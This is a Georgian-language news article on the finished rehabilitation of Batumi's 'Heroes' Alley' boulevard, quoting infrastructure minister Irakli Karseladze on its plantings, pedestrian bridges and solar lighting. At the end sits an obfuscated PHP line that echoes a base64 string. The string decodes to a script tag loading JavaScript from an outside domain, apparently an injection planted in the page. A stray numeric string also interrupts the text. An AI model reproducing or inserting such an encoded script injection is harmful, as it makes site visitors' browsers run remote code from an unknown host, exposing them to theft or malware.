celsiusi
ავერსი საქკაბელი

 ,,საქართველოს პრემიერ მინისტრთან ერთად ქალაქ ბათუმში დავათვალიერეთ დასრულებული ახალი ბულვარი ,,გმირთა ხეივანი“. რეაბილიტაციის პროექტი ითვალისწინებდა ამ სივრცის განვითარებას და ფუნქციურ დატვირთვას. რეკრეაციასთან ერთად მოეწყო საგზაო უსაფრთხოების მარეგულირებელი მექანიზმები , რომელიც ხიდების სახით იქნა წარმოდგენილი და მნიშვნელოვან სატრანსპორტო არტერიებზე უსაფრთხო გადაადგილების საშუალებას აძლევს ფეხმავლებს“-ამის შესახებ რეგიონული განვითარებისა და ინფრასტრუქტურის მინისტრმა ირაკლი ქარსელაძემ ახალი ბულვარის რეაბილიტაციის სამუშაოების დათვალიერების შემდეგ განაცხადა.

ქალაქის ახალი ცენტრალური სტადიონის მიმდებარე 1 კმ სიგრძის „გმირთა ხეივნის“ რეაბილიტაციის პროექტი, რეგიონული განვითარებისა და ინფრასტრუქტურის სამინისტროს მუნიციპალური განვითარების ფონდმა, პროგრამა „განახლებული რეგიონების“ ფარგლებში, განახორციელა.

747A609165655555555555555555

მინისტრმა აღნიშნა, რომ ხეივანში შეიცვალა და განახლდა დენდროლოგია, კლიმატური პირობების შესაბამისად შერჩეული, სხვადასხვა ჯიშის 12000 მწვანე ნარგავით, გამოიცვალა მიწისქვეშა კომუნიკაციები, მოეწყო სარწყავი სისტემა, საფეხმავლო ბილიკები, კომერციული და მოსასვენებელი სივრცეები, გარემო მთლიანად არის ადაპტირებული სპეციალური საჭიროების მქონე ადამიანებისთვის.

,,მნიშნელოვანია, რომ ახალი კომერციული სივრცეები შესაძლებლობას მისცემს მუნიციპალიტეტებს ახალი მიზიდულობის ცენტრების შექმნისთვის , რომლითაც ისარგებლებენ, როგორც ბათუმელები, ასევე ქალაქის სტუმრები. რეაბილიტაციისას გამოყენებული იქნა სხვადასხვა ტიპის ენერგოეფექტური განათებები, ისევე როგორც მზის პანელები. შეიძლება ითქვას, რომ მაქსიმალურად ყველა თანამედროვე ინოვაცია იქნა დანერგილი. აღნიშნული პროექტი ნამდვილად არის ახალი სავიზიტო ადგილი და ახალი მიზიდულობის ცენტრი, რომელიც შეიძინა ქალაქმა ბათუმმა“-განაცხადა ირაკლი ქარსელაძემ.

145
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");